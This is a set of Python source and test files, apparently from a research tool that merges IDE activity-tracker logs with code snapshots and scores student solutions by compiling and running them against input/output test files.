action_events = consts.ACTIVITY_TRACKER_EVENTS.action_events()
ati_data = ati_data[(ati_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value].isin(event_types))
& (ati_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value].isin(action_events))]
ati_data.index = [*range(ati_data.shape[0])]
return ati_data
def __get_default_dict_for_at() -> Dict[str, List[Any]]:
return {
consts.ACTIVITY_TRACKER_COLUMN.TIMESTAMP_ATI.value: [],
consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value: [],
consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value: []
}
def __add_values_in_ati_dict(ati_dict: Dict[str, List[Any]], timestamp: str = '', event_type: str = '',
event_data: str = '') -> None:
ati_dict[consts.ACTIVITY_TRACKER_COLUMN.TIMESTAMP_ATI.value].append(timestamp)
ati_dict[consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value].append(event_type)
ati_dict[consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value].append(event_data)
def __add_values_in_ati_dict_by_ati_index(res_dict: Dict[str, List[Any]], activity_tracker_data: pd.DataFrame,
index: int) -> None:
__add_values_in_ati_dict(res_dict,
activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.TIMESTAMP_ATI.value].iloc[index],
activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value].iloc[index],
activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value].iloc[index])
def __are_same_files(code_tracker_file_name: str, activity_tracker_file_path: str) -> bool:
if pd.isnull(activity_tracker_file_path):
return False
try:
activity_tracker_file_name = get_name_from_path(activity_tracker_file_path)
except ValueError:
# If the activity_tracker_file_name has an invalid extension, it does not equal code_tracker_file_name
return False
return code_tracker_file_name == activity_tracker_file_name
# Insert a row into the dataframe before the row_number position.
# For example, given a dataframe with 1 column and 3 rows: A C D,
# calling with row_number = 1 and row_value = B returns a dataframe with rows: A B C D
def __insert_row(df: pd.DataFrame, row_number: int, row_value: list) -> pd.DataFrame:
if row_number > df.index.max() + 1:
log_and_raise_error('Invalid row_number in the method __insert_row', log)
df1 = df[0:row_number]
df2 = df[row_number:]
df1.loc[row_number] = row_value
df_result = pd.concat([df1, df2])
df_result.index = [*range(df_result.shape[0])]
return df_result
def preprocess_activity_tracker_data(activity_tracker_data: pd.DataFrame,
to_filter_ati_data: bool = True) -> pd.DataFrame:
log.info('...starting to unify activity tracker data')
activity_tracker_data = __unify_activity_tracker_columns(activity_tracker_data)
log.info('finish unifying activity tracker data')
if to_filter_ati_data:
log.info('...starting to filter activity tracker data')
activity_tracker_data = __filter_ati_data(activity_tracker_data)
log.info('finish filtering activity tracker data')
return activity_tracker_data
def __create_joined_code_tracker_data_frame(code_tracker_data: pd.DataFrame,
res: Dict[str, List[Any]]) -> pd.DataFrame:
ati_df = pd.DataFrame(res)
return code_tracker_data.join(ati_df)
def get_full_default_columns_for_at(count_rows: int) -> Dict[str, List[Any]]:
res = __get_default_dict_for_at()
for i in range(count_rows):
__add_values_in_ati_dict(res)
return res
# Get size of result for activity tracker data
def __get_dict_lists_size(res: Dict[str, List[Any]]) -> int:
size = 0
for key in res.keys():
if size != 0 and len(res[key]) != size:
log_and_raise_error('Lists in the res dict have different sizes', log)
size = len(res[key])
return size
def is_last(index: int, data: pd.DataFrame) -> bool:
return index == data.shape[0] - 1
def is_next_ct_valid(ati_time: datetime, cur_ct_i: int, code_tracker_data: pd.DataFrame) -> bool:
next_ct_time = get_datetime_by_format(code_tracker_data[consts.TASK_TRACKER_COLUMN.DATE.value].iloc[cur_ct_i + 1])
return (ati_time - next_ct_time).total_seconds() >= 0
def is_ct_i_filled(ct_i: int, ati_dict: Dict[str, List[Any]]) -> bool:
return __get_dict_lists_size(ati_dict) > ct_i
def merge_task_tracker_and_activity_tracker_data(code_tracker_data: pd.DataFrame,
activity_tracker_data: pd.DataFrame) -> pd.DataFrame:
log.info('Start merging code tracker and activity tracker data')
res = __get_default_dict_for_at()
ct_file_name = code_tracker_data[consts.TASK_TRACKER_COLUMN.FILE_NAME.value].iloc[0]
ct_i = 0
for ati_i in range(activity_tracker_data.shape[0]):
activity_tracker_file_path = activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.CURRENT_FILE.value].iloc[
ati_i]
if not __are_same_files(ct_file_name, activity_tracker_file_path):
continue
ati_time = get_datetime_by_format(
activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.TIMESTAMP_ATI.value].iloc[ati_i])
while not is_last(ct_i, code_tracker_data) and is_next_ct_valid(ati_time, ct_i, code_tracker_data):
if not is_ct_i_filled(ct_i, res):
__add_values_in_ati_dict(res)
ct_i += 1
if is_ct_i_filled(ct_i, res):
ct_row = list(code_tracker_data.iloc[ct_i])
code_tracker_data = __insert_row(code_tracker_data, ct_i + 1, ct_row)
ct_i += 1
__add_values_in_ati_dict_by_ati_index(res, activity_tracker_data, ati_i)
log.info('Finish handling the activity tracker file')
times = code_tracker_data.shape[0] - __get_dict_lists_size(res)
while times > 0:
__add_values_in_ati_dict(res)
times -= 1
log.info('Finish setting empty values for the last code tracker items')
code_tracker_data = __create_joined_code_tracker_data_frame(code_tracker_data, res)
log.info('Finish merging code tracker and activity tracker data')
return code_tracker_data
def __remove_nan(items: List[Any]) -> List[Any]:
return list(filter(lambda x: not pd.isnull(x), items))
def get_files_from_ati(activity_tracker_data: pd.DataFrame) -> List[str]:
"""
Get all the filenames that were tracked by the activity tracker plugin.
"""
return __remove_nan(activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.CURRENT_FILE.value].unique())
def get_tt_name_from_ati_data(ct_file: str, language: consts.LANGUAGE, files_from_at: List[str]) -> Tuple[str, bool]:
"""
Try to find the current name of the code tracker file among those tracked by the activity tracker plugin.
"""
log.info('Start getting project file name')
extension = get_extension_by_language(language)
hashed_file_name = get_name_from_path(ct_file)
file_name = get_original_file_name_with_extension(hashed_file_name, extension)
does_contain_name = True
if files_from_at is not None:
log.info(f'Start searching the file_name {file_name} in activity tracker data')
if file_name not in files_from_at:
log.info(f'Activity tracker data does not contain the original file {file_name}')
does_contain_name = False
log.info(f'Finish searching the file_name {file_name} in activity tracker data')
log.info('Finish getting project file name')
return file_name, does_contain_name
def handle_ati_file(ati_file: str, to_filter_ati_data: bool = True) -> pd.DataFrame:
ati_df = None
if ati_file:
ati_df = pd.read_csv(ati_file, encoding=consts.ISO_ENCODING,
names=consts.ACTIVITY_TRACKER_COLUMN.activity_tracker_columns())
ati_df = preprocess_activity_tracker_data(ati_df, to_filter_ati_data)
return ati_df
```
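The row-insertion helper above is easiest to understand through the A C D -> A B C D example from its comment. Below is a minimal standalone sketch of the same behavior, assuming only pandas; it mirrors __insert_row but is not the repository function itself.

```python
import pandas as pd


def insert_row(df: pd.DataFrame, row_number: int, row_value: list) -> pd.DataFrame:
    # Split the frame at row_number, append the new row to the first part,
    # then glue the parts back together and rebuild a continuous index.
    first, rest = df[0:row_number].copy(), df[row_number:]
    first.loc[row_number] = row_value
    result = pd.concat([first, rest])
    result.index = [*range(result.shape[0])]
    return result


df = pd.DataFrame({'value': ['A', 'C', 'D']})
print(insert_row(df, 1, ['B'])['value'].tolist())  # ['A', 'B', 'C', 'D']
```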
#### File: main/task_scoring/java_task_checker.py
```python
import logging
from typing import List
import javalang
from javalang.tokenizer import LexerError
from javalang.parser import JavaSyntaxError, JavaParserError
from src.main.util import consts
from src.main.util.consts import LANGUAGE
from src.main.util.file_util import get_name_from_path
from src.main.task_scoring.task_checker import ITaskChecker, check_call_safely, check_output_safely, SOURCE_OBJECT_NAME, \
SOURCE_FOLDER
log = logging.getLogger(consts.LOGGER_NAME)
class JavaTaskChecker(ITaskChecker):
def __init__(self):
self.package = ''
@property
def language(self) -> LANGUAGE:
return LANGUAGE.JAVA
# class A{
# public static void main(String args[]){
# Scanner in=new Scanner(System.in);
# Int a=in.nextInt();
# System.out.print(a);}}
@property
def min_symbols_number(self) -> int:
return 140
@property
def output_strings(self) -> List[str]:
return ['System.out.print']
# https://github.com/c2nes/javalang
def get_java_class_name(self, source_code: str) -> str:
try:
tree = javalang.parse.parse(source_code)
name = next(clazz.name for clazz in tree.types
if isinstance(clazz, javalang.tree.ClassDeclaration)
for m in clazz.methods
if m.name == 'main' and m.modifiers.issuperset({'public', 'static'}))
if tree.package:
log.info(f'Java source code package is {tree.package.name}')
self.package = tree.package.name + '.'
return name
except (JavaSyntaxError, JavaParserError, LexerError) as e:
log.info('Java lexer/parser exception was raised')
log.exception(e)
return SOURCE_OBJECT_NAME
except Exception as e:
log.exception(e)
return SOURCE_OBJECT_NAME
def create_source_file(self, source_code: str) -> str:
source_file_name = self.get_java_class_name(source_code)
return self.create_source_file_with_name(source_code, source_file_name)
def is_source_file_correct(self, source_file: str) -> bool:
args = ['javac', source_file, '-d', SOURCE_FOLDER]
is_correct = check_call_safely(args, None)
log.info(f'Source code is correct: {is_correct}')
return is_correct
def run_test(self, input: str, expected_output: str, source_file: str) -> bool:
args = ['java', '-cp', SOURCE_FOLDER, self.package + get_name_from_path(source_file, False)]
return check_output_safely(input, expected_output, args)
```
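The class-name lookup above relies on the javalang parser. Here is a minimal sketch of the same lookup on a toy snippet, assuming the javalang package is installed; the real checker falls back to SOURCE_OBJECT_NAME when parsing fails.

```python
import javalang

source_code = '''
public class Solution {
    public static void main(String[] args) {
        System.out.print(42);
    }
}
'''

tree = javalang.parse.parse(source_code)
# Pick the first top-level class that declares a public static main method,
# mirroring the generator expression in get_java_class_name above.
name = next(clazz.name for clazz in tree.types
            if isinstance(clazz, javalang.tree.ClassDeclaration)
            for m in clazz.methods
            if m.name == 'main' and m.modifiers.issuperset({'public', 'static'}))
print(name)  # Solution
```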
#### File: main/task_scoring/tasks_tests_handler.py
```python
import os
import logging
from typing import List, Tuple, Optional
import pandas as pd
from src.main.util import consts
from src.main.util.consts import LANGUAGE, TASK
from src.main.util.log_util import log_and_raise_error
from src.main.task_scoring.cpp_task_checker import CppTaskChecker
from src.main.task_scoring.java_task_checker import JavaTaskChecker
from src.main.processing.task_tracker_handler import get_tt_language
from src.main.task_scoring.kotlin_task_checker import KotlinTaskChecker
from src.main.task_scoring.python_task_checker import PythonTaskChecker
from src.main.task_scoring.task_checker import TASKS_TESTS_PATH, FilesDict
from src.main.task_scoring.undefined_task_checker import UndefinedTaskChecker
from src.main.util.file_util import get_all_file_system_items, tt_file_condition, get_output_directory, \
write_based_on_language, get_file_and_parent_folder_names, pair_in_and_out_files, match_condition, \
get_name_from_path, get_parent_folder, get_parent_folder_name
log = logging.getLogger(consts.LOGGER_NAME)
FRAGMENT = consts.TASK_TRACKER_COLUMN.FRAGMENT.value
TESTS_RESULTS = consts.TASK_TRACKER_COLUMN.TESTS_RESULTS.value
def create_in_and_out_dict(tasks: List[TASK]) -> FilesDict:
in_and_out_files_dict = {}
for task in tasks:
root = os.path.join(TASKS_TESTS_PATH, task.value)
in_files = get_all_file_system_items(root, match_condition(r'in_\d+.txt'))
out_files = get_all_file_system_items(root, match_condition(r'out_\d+.txt'))
if len(out_files) != len(in_files):
log_and_raise_error('Length of out files list does not equal in files list', log)
in_and_out_files_dict[task] = pair_in_and_out_files(in_files, out_files)
return in_and_out_files_dict
def check_tasks(tasks: List[TASK], source_code: str, in_and_out_files_dict: FilesDict,
language: LANGUAGE = LANGUAGE.PYTHON, stop_after_first_false: bool = True,
current_task: Optional[TASK] = None) -> List[float]:
if language == LANGUAGE.PYTHON:
task_checker = PythonTaskChecker()
elif language == LANGUAGE.JAVA:
task_checker = JavaTaskChecker()
elif language == LANGUAGE.CPP:
task_checker = CppTaskChecker()
elif language == LANGUAGE.KOTLIN:
task_checker = KotlinTaskChecker()
else:
task_checker = UndefinedTaskChecker()
return task_checker.check_tasks(tasks, source_code, in_and_out_files_dict, stop_after_first_false,
current_task=current_task)
def __check_tasks_on_correct_fragments(data: pd.DataFrame, tasks: List[TASK], in_and_out_files_dict: FilesDict,
file_log_info: str = '',
current_task: Optional[TASK] = None) -> Tuple[LANGUAGE, pd.DataFrame]:
data[FRAGMENT] = data[FRAGMENT].fillna('')
# If run after processing, this value can be taken from 'language' column
language = get_tt_language(data)
log.info(f'{file_log_info}, language is {language.value}, found {str(data.shape[0])} fragments')
if language == consts.LANGUAGE.UNDEFINED:
data[TESTS_RESULTS] = str([consts.TEST_RESULT.LANGUAGE_UNDEFINED.value] * len(tasks))
else:
unique_fragments = list(data[FRAGMENT].unique())
log.info(f'Found {str(len(unique_fragments))} unique fragments')
fragment_to_test_results_dict = dict(
map(lambda f:
(f, check_tasks(tasks, f, in_and_out_files_dict, language, current_task=current_task)),
unique_fragments))
data[TESTS_RESULTS] = data.apply(lambda row: fragment_to_test_results_dict[row[FRAGMENT]], axis=1)
return language, data
def filter_already_tested_files(files: List[str], output_directory_path: str) -> List[str]:
tested_files = get_all_file_system_items(output_directory_path, tt_file_condition)
tested_folder_and_file_names = list(map(lambda f: get_file_and_parent_folder_names(f), tested_files))
return list(filter(lambda f: get_file_and_parent_folder_names(f) not in tested_folder_and_file_names, files))
def __get_task_by_ct_file(file: str) -> Optional[TASK]:
task_key = get_name_from_path(get_parent_folder(file), with_extension=False)
try:
return TASK(task_key)
except ValueError:
log.info(f'Unexpected task for the file {file}')
return None
def __get_user_folder_name_from_path(file: str) -> str:
task_folder = get_parent_folder(file)
return get_parent_folder_name(task_folder)
def run_tests(path: str) -> str:
"""
Run tests on all code snapshots in the data for the task.
Note: the enum class TASK (see consts.py file) must have the task key.
    The key must also match the name of the folder with test files in resources/tasks_tests.
For example, if your task has key [my_key], you should add a new value into TASK const with value [my_key]
and add a new folder [my_key] with input and output files for tests in the resources/tasks_tests folder.
The test result is an array containing values for all tasks from the TASK enum class.
If the code snapshot is incorrect, then the value -1 is specified.
To deserialize this array of ratings, use the function unpack_tests_results from task_scoring.py.
    To get the rate only for the current task, use the calculate_current_task_rate function from plots/scoring_solutions_plots.py.
For more details see
https://github.com/JetBrains-Research/task-tracker-post-processing/wiki/Data-processing:-find-tests-results-for-the-tasks
"""
log.info(f'Start running tests on path {path}')
output_directory = get_output_directory(path, consts.RUNNING_TESTS_OUTPUT_DIRECTORY)
files = get_all_file_system_items(path, tt_file_condition)
str_len_files = str(len(files))
    log.info(f'Found {str_len_files} files to run tests on')
files = filter_already_tested_files(files, output_directory)
str_len_files = str(len(files))
    log.info(f'Found {str_len_files} files to run tests on after filtering out already tested files')
tasks = TASK.tasks()
in_and_out_files_dict = create_in_and_out_dict(tasks)
for i, file in enumerate(files):
file_log_info = f'file: {str(i + 1)}/{str_len_files}'
log.info(f'Start running tests on {file_log_info}, {file}')
current_task = __get_task_by_ct_file(file)
if not current_task:
            # We don't need to handle files for tasks that are not in the TASK enum class
continue
data = pd.read_csv(file, encoding=consts.ISO_ENCODING)
language, data = __check_tasks_on_correct_fragments(data, tasks, in_and_out_files_dict, file_log_info,
current_task=current_task)
log.info(f'Finish running tests on {file_log_info}, {file}')
output_directory_with_user_folder = os.path.join(output_directory, __get_user_folder_name_from_path(file))
write_based_on_language(output_directory_with_user_folder, file, data, language)
return output_directory
```
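As the run_tests docstring notes, every task key needs a matching folder of paired input and output files under resources/tasks_tests. Below is a hedged sketch of the expected layout for a task with key my_key, together with the substitution that pairs the files (the same one pair_in_and_out_files in file_util.py uses).

```python
# Assumed layout (my_key is the placeholder key from the docstring above):
#
#   resources/tasks_tests/my_key/in_1.txt   <- input fed to the solution
#   resources/tasks_tests/my_key/out_1.txt  <- expected output for in_1.txt
#   resources/tasks_tests/my_key/in_2.txt
#   resources/tasks_tests/my_key/out_2.txt
#
import re

in_file = 'resources/tasks_tests/my_key/in_1.txt'
out_file = re.sub(r'in(?=[^in]*$)', 'out', in_file)
print(out_file)  # resources/tasks_tests/my_key/out_1.txt
```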
#### File: main/util/file_util.py
```python
import os
import re
import pickle
import shutil
from shutil import copyfile
from typing import Callable, Any, List, Tuple, Type, Optional
import pandas as pd
from src.main.util.strings_util import contains_any_of_substrings
from src.main.util.consts import ACTIVITY_TRACKER_FILE_NAME, FILE_SYSTEM_ITEM, ATI_DATA_FOLDER, \
DI_DATA_FOLDER, ISO_ENCODING, LANGUAGE, UTF_ENCODING, EXTENSION, TASK
'''
To understand these functions' behavior correctly, see the examples in the corresponding test folder.
Also, the naming convention can be helpful:
folder_name -- just the name without any slashes;
>>> EXAMPLE: folder_name for the last folder in 'path/data/folder/' is 'folder'
file_name -- similar to folder_name, but may contain an extension;
>>> EXAMPLE: file_name for the file 'path/data/file.csv' can be 'file.csv' or just 'file' (see get_name_from_path)
file, folder, directory -- contain the full path
extension -- we assume that a non-empty extension comes with a dot, because of the os.path implementation;
If an extension is passed without a dot, a dot will be added (for example, see change_extension_to)
parent_folder -- the second folder from the end of the path, no matter whether there is a trailing slash or not
>>> EXAMPLE: parent_folder for both 'path/data/file' and 'path/data/file/' is 'path/data'
'''
ItemCondition = Callable[[str], bool]
def remove_slash(path: str) -> str:
return path.rstrip('/')
def serialize_data_and_write_to_file(path: str, data: Any) -> None:
create_directory(get_parent_folder(path))
with open(path, 'wb') as f:
p = pickle.Pickler(f)
p.dump(data)
def deserialize_data_from_file(path: str) -> Any:
with open(path, 'rb') as f:
u = pickle.Unpickler(f)
return u.load()
def add_slash(path: str) -> str:
if not path.endswith('/'):
path += '/'
return path
# For getting the name of the last folder or file
# For example, returns 'folder' for both 'path/data/folder' and 'path/data/folder/'
# You can find more examples in the tests
def get_name_from_path(path: str, with_extension: bool = True) -> str:
head, tail = os.path.split(path)
# Tail can be empty if '/' is at the end of the path
file_name = tail or os.path.basename(head)
if not with_extension:
file_name = os.path.splitext(file_name)[0]
elif get_extension_from_file(file_name) == EXTENSION.EMPTY:
raise ValueError('Cannot get file name with extension, because the passed path does not contain it')
return file_name
# Non-empty extensions are returned with a dot, for example '.txt'
# If a file has no extension, an empty one ('') is returned
def get_extension_from_file(file: str) -> EXTENSION:
return EXTENSION(os.path.splitext(file)[1])
def add_dot_to_not_empty_extension(extension: EXTENSION) -> str:
new_extension = extension.value
if extension != EXTENSION.EMPTY and not extension.value.startswith('.'):
new_extension = '.' + new_extension
return new_extension
# Todo: add tests
def add_suffix_to_file(file: str, suffix: str) -> str:
base, extension = os.path.splitext(file)
return f'{base}_{suffix}{extension}'
# If need_to_rename is True, this works only for real files because os.rename is called
def change_extension_to(file: str, new_extension: EXTENSION, need_to_rename: bool = False) -> str:
new_extension = add_dot_to_not_empty_extension(new_extension)
base, _ = os.path.splitext(file)
if need_to_rename:
os.rename(file, base + new_extension)
return base + new_extension
def get_parent_folder(path: str, to_add_slash: bool = False) -> str:
path = remove_slash(path)
parent_folder = '/'.join(path.split('/')[:-1])
if to_add_slash:
parent_folder = add_slash(parent_folder)
return parent_folder
# For given directory structure:
# /root
# -- /foo
# ---- /bar
# ------ /class_file.py
# -------- class A
# returns 'root.foo.bar'
def get_class_parent_package(clazz: Type[object]) -> str:
# For example from comment above, class_module is 'root.foo.bar.class_file'
class_module = clazz.__module__
# Cut everything after the last dot to get parent package:
return class_module.rsplit(sep='.', maxsplit=1)[0]
def get_parent_folder_name(path: str) -> str:
return get_name_from_path(get_parent_folder(path), False)
def get_original_file_name(hashed_file_name: str) -> str:
return '_'.join(hashed_file_name.split('_')[:-4])
def get_original_file_name_with_extension(hashed_file_name: str, extension: EXTENSION) -> str:
extension = add_dot_to_not_empty_extension(extension)
return get_original_file_name(hashed_file_name) + extension
def get_content_from_file(file: str, encoding: str = ISO_ENCODING, to_strip_nl: bool = True) -> str:
with open(file, 'r', encoding=encoding) as f:
content = f.read()
return content if not to_strip_nl else content.rstrip('\n')
# File should contain the full path and its extension
def create_file(content: str, file: str) -> None:
create_directory(os.path.dirname(file))
with open(file, 'w') as f:
f.write(content)
def is_file(file: str) -> bool:
return os.path.isfile(file)
def remove_file(file: str) -> None:
if is_file(file):
os.remove(file)
def remove_all_png_files(root: str, condition: Callable) -> None:
files = get_all_file_system_items(root, condition)
for file in files:
remove_file(file)
def does_exist(path: str) -> bool:
return os.path.exists(path)
def create_directory(directory: str) -> None:
os.makedirs(directory, exist_ok=True)
def remove_directory(directory: str) -> None:
if os.path.exists(directory):
shutil.rmtree(directory, ignore_errors=True)
# To get something like 'ati_239/Main_2323434_343434.csv'
def get_file_and_parent_folder_names(file: str) -> str:
return os.path.join(get_parent_folder_name(file), get_name_from_path(file))
def all_items_condition(name: str) -> bool:
return True
def __enum_item_condition(name: str, enum) -> bool:
for item in enum:
if item.value == name:
return True
return False
def language_item_condition(name: str) -> bool:
return __enum_item_condition(name, LANGUAGE)
def task_item_condition(name: str) -> bool:
return __enum_item_condition(name, TASK)
# To get all files or subdirs (depends on the last parameter) from root that match item_condition
# Can be used to get all task-tracker files, all data folders, etc.
# Note that all returned subdirs or files already contain their full path
def get_all_file_system_items(root: str, item_condition: ItemCondition = all_items_condition,
item_type: FILE_SYSTEM_ITEM = FILE_SYSTEM_ITEM.FILE) -> List[str]:
items = []
for fs_tuple in os.walk(root):
for item in fs_tuple[item_type.value]:
if item_condition(item):
items.append(os.path.join(fs_tuple[FILE_SYSTEM_ITEM.PATH.value], item))
return items
def extension_file_condition(extension: EXTENSION) -> ItemCondition:
def has_this_extension(name: str) -> bool:
return get_extension_from_file(name) == extension
return has_this_extension
# To get all task-tracker files
def tt_file_condition(name: str) -> bool:
return ACTIVITY_TRACKER_FILE_NAME not in name and extension_file_condition(EXTENSION.CSV)(name)
def contains_substrings_condition(substrings: List[str]) -> ItemCondition:
def contains_these_substrings(name: str) -> bool:
return contains_any_of_substrings(name, substrings)
return contains_these_substrings
def match_condition(regex: str) -> ItemCondition:
def does_name_match(name: str) -> bool:
return re.fullmatch(regex, name) is not None
return does_name_match
# To get all subdirs that contain ct and ati data
def data_subdirs_condition(name: str) -> bool:
return ATI_DATA_FOLDER in name or DI_DATA_FOLDER in name
# To get all subdirs that contain user data
def user_subdirs_condition(name: str) -> bool:
return 'user' in name
# To get the path to the output directory that sits next to the original folder
# and has the same name but with a suffix added at the end
def get_output_directory(folder: str, result_name_suffix: str) -> str:
output_directory_name = get_name_from_path(folder, False) + '_' + result_name_suffix
return os.path.join(get_parent_folder(folder), output_directory_name)
def create_folder_and_write_df_to_file(folder_to_write: str, file_to_write: str, df: pd.DataFrame) -> None:
create_directory(folder_to_write)
    # We got an error with encoding=ISO_ENCODING on ati_225/153e12:
    # "UnicodeEncodeError: 'latin-1' codec can't encode character '\u0435' in position 36: ordinal not in range(256)"
    # So in that case we fall back to 'utf-8'
try:
df.to_csv(file_to_write, encoding=ISO_ENCODING, index=False)
except UnicodeEncodeError:
df.to_csv(file_to_write, encoding=UTF_ENCODING, index=False)
# To write a dataframe to the output_directory preserving the same file structure as before
# For example, for the path home/task-tracker/data and the file home/task-tracker/data/folder1/folder2/ati_566/file.csv
# the dataframe will be written to output_directory/folder1/folder2/ati_566/file.csv
def write_result(output_directory: str, path: str, file: str, df: pd.DataFrame) -> None:
    # Check that the file is inside the path, otherwise we cannot reproduce its structure inside the output_directory
if path != file[:len(path)]:
raise ValueError('File is not in a path')
path_from_output_directory_to_file = file[len(path):].lstrip('/')
file_to_write = os.path.join(output_directory, path_from_output_directory_to_file)
folder_to_write = get_parent_folder(file_to_write)
create_folder_and_write_df_to_file(folder_to_write, file_to_write, df)
# To write a dataframe to the output_directory based on the language, preserving only the parent folder structure
# For example, for the file path/folder1/folder2/ati_566/file.csv and the python language, the dataframe will be
# written to output_directory/python/ati_566/file.csv
def write_based_on_language(output_directory: str, file: str, df: pd.DataFrame,
                            language: LANGUAGE = LANGUAGE.PYTHON) -> None:
folder_to_write = os.path.join(output_directory, language.value, get_parent_folder_name(file))
file_to_write = os.path.join(folder_to_write, get_name_from_path(file))
create_folder_and_write_df_to_file(folder_to_write, file_to_write, df)
def pair_in_and_out_files(in_files: list, out_files: list) -> List[Tuple[str, str]]:
pairs = []
for in_file in in_files:
out_file = re.sub(r'in(?=[^in]*$)', 'out', in_file)
if out_file not in out_files:
raise ValueError(f'List of out files does not contain a file for {in_file}')
pairs.append((in_file, out_file))
return pairs
def sort_files_by_size(files: List[str], to_reverse: bool = False) -> List[str]:
files.sort(key=lambda f: os.stat(f).st_size, reverse=to_reverse)
return files
def get_file_with_max_size(files: List[str]) -> Optional[str]:
if not files:
return None
return sort_files_by_size(files, to_reverse=True)[0]
def copy_file(src: str, dst: str) -> None:
if is_file(src):
create_directory(get_parent_folder(dst))
copyfile(src, dst)
```
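A short sketch of the naming convention from the module docstring above, assuming the helpers are importable from src.main.util.file_util (the import path used elsewhere in the repository):

```python
from src.main.util.file_util import get_name_from_path, get_parent_folder, get_output_directory

print(get_name_from_path('path/data/file.csv'))         # 'file.csv'
print(get_name_from_path('path/data/file.csv', False))  # 'file'
print(get_parent_folder('path/data/file/'))             # 'path/data'
# The output directory sits next to the original folder with a suffix appended:
print(get_output_directory('path/data', 'tests'))       # 'path/data_tests'
```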
#### File: main/util/math_util.py
```python
import logging
from typing import Optional, Any, List
from statistics import median, StatisticsError
from src.main.util.consts import LOGGER_NAME
log = logging.getLogger(LOGGER_NAME)
def get_safety_median(values: List[Any], default_value: Optional[Any] = None) -> Optional[Any]:
try:
return median(values)
except StatisticsError:
log.info(f'Have gotten empty list to calculate median. Return default value:{default_value}')
return default_value
```
#### File: main/util/strings_util.py
```python
import re
from typing import List
def add_symbol_to_begin(string: str, symbol: str) -> str:
if not string.startswith(symbol):
string = symbol + string
return string
def contains_any_of_substrings(string: str, substrings: List[str]) -> bool:
for substring in substrings:
if substring in string:
return True
return False
def convert_camel_case_to_snake_case(string: str) -> str:
words = re.findall(r'[A-Z]?[a-z]+|[A-Z]{1,}(?=[A-Z][a-z]|\d|\W|$|_)|\d+\.\d+|\d+', string)
return '_'.join(map(str.lower, words))
def crop_string(string: str, short_part_length: int, separator: str = '...') -> str:
return ''.join((string[:short_part_length], separator, string[-short_part_length:]))
```
#### File: task_scoring/tasks_tests_handler/util.py
```python
import os
import logging
from enum import Enum
from typing import Dict, Tuple
from src.main.util import consts
from src.main.util.consts import TASK, LANGUAGE
from src.main.util.consts import TEST_DATA_PATH
from src.main.util.file_util import get_content_from_file
from src.main.task_scoring.task_checker import remove_compiled_files, FilesDict
from src.main.task_scoring.tasks_tests_handler import check_tasks, create_in_and_out_dict
log = logging.getLogger(consts.LOGGER_NAME)
class SOLUTION(Enum):
FULL = "full"
PARTIAL = "partial"
WRONG = "wrong"
ERROR = "error"
def get_actual_rate(task: TASK, language: consts.LANGUAGE, code: str, in_and_out_files_dict: FilesDict) -> float:
return check_tasks([task], code, in_and_out_files_dict, language, False)[0]
def get_source_code(task: TASK, language: consts.LANGUAGE, solution: str) -> str:
return get_content_from_file(os.path.join(TEST_DATA_PATH, "task_scoring/tasks_tests_handler", task.value,
language.value, solution + ".txt"))
def run_test_task(task: TASK, expected_pairs: Dict[SOLUTION, Tuple[int, int]], language: LANGUAGE) -> None:
remove_compiled_files()
in_and_out_files_dict = create_in_and_out_dict(TASK.tasks())
for s in SOLUTION:
code = get_source_code(task, language, s.value)
expected_pair = expected_pairs[s.value]
expected_rate = expected_pair[1] / expected_pair[0]
actual_rate = get_actual_rate(task, language, code, in_and_out_files_dict)
assert expected_rate == actual_rate, \
f'Actual rate for task {task}, language {language}, solution {s} is wrong, code:\n{code}. ' \
f'Expected rate = {expected_rate}. Actual rate = {actual_rate}'
```
#### File: util/strings_util/camel_case_to_snake_case_test.py
```python
from typing import Tuple
import pytest
from src.test.test_config import to_skip, TEST_LEVEL
from src.main.util.strings_util import convert_camel_case_to_snake_case
data = [('considerMeAsOneWhoLovedPoetryAndPersimmons', 'consider_me_as_one_who_loved_poetry_and_persimmons'),
('ResponseHTTP23', 'response_http_23'),
('maxDigit', 'max_digit'),
('max3', 'max_3'),
('already_snake_case', 'already_snake_case'),
('pies', 'pies'),
('WRITE_TASK', 'write_task'),
('', ''),
('13.0', '13.0'),
('IAm11.0YearsOld', 'i_am_11.0_years_old'),
('aB', 'a_b')]
@pytest.mark.skipif(to_skip(current_module_level=TEST_LEVEL.UTIL), reason=TEST_LEVEL.UTIL.value)
class TestConversionToSnakeCase:
@pytest.mark.parametrize('d', [_ for _ in data])
def test_upper_letters(self, d: Tuple[str, str]) -> None:
camel_case, snake_case = d
converted_snake_case = convert_camel_case_to_snake_case(camel_case)
assert snake_case == converted_snake_case, f'{converted_snake_case} is not equal {snake_case}'
```
#### File: util/strings_util/containing_substrings_test.py
```python
from typing import Callable, Tuple, List
import pytest
from src.test.test_config import to_skip, TEST_LEVEL
from src.main.util.strings_util import contains_any_of_substrings
string = 'Roses are red, violets are blue, sugar is sweet, and so are you'
contained_substrings = ['red', 'blue']
partly_contained_substrings = ['mint', 'candy', 'sugar']
not_contained_substrings = ['parsley', 'sun']
@pytest.mark.skipif(to_skip(current_module_level=TEST_LEVEL.UTIL), reason=TEST_LEVEL.UTIL.value)
class TestContainingSubstrings:
@staticmethod
@pytest.fixture(scope="function",
params=[
(contained_substrings, True),
(partly_contained_substrings, True),
(not_contained_substrings, False)
])
def param_contained_substrings_test(request) -> Tuple[List[str], bool]:
return request.param
def test_contained_substrings(self, param_contained_substrings_test: Callable) -> None:
(in_data, expected_res) = param_contained_substrings_test
assert contains_any_of_substrings(string, in_data) == expected_res
```